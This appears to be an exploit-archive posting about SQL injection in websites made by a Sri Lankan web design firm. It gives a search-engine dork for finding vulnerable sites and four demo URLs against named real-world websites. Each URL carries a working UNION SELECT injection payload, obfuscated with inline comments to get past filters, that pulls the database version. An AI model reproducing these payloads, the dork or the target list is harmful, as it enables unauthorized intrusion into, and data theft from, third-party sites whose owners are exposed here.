# Exploit Title: Synotec Holdings Sql Injection Vulnerability
# Dork: "WEB SITE BY: Synotec Holdings (Pvt) Ltd."
# Date: 2020-09-12
# Exploit Author: Behrouz Mansoori
# Vendor Homepage: https://www.synotec.lk
# Category: Webapps
# Tested on: Windows 10
=======================================
Proof of Concept:
Search google Dork: "WEB SITE BY: Synotec Holdings (Pvt) Ltd."
[+]Demo 1:
https://www.applevacations.com.co/view-city.php?id=-11%20/*!12345union*/%20/*!12345select*/%201,version(),3,4,5--
[+]Demo 2:
https://samara.lk/view-product.php?id=-46%20%23SALAMMMMM%0Aunion%20%23SALAMMMMM%0Aselect%201,2,version(),4,5,6,7--
[+]Demo 3:
http://www.unawatunadive.com/view-dive-courses.php?id=-1%27%20/*!12345union*/%20select%201,version(),3,4,5,6,7,8--+
[+]Demo 4:
http://horizon-villa.com/view-facilities.php?id=-39%20/*!12345union*/%20select%201,version(),3,4,5,6--
#########################################################
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
#########################################################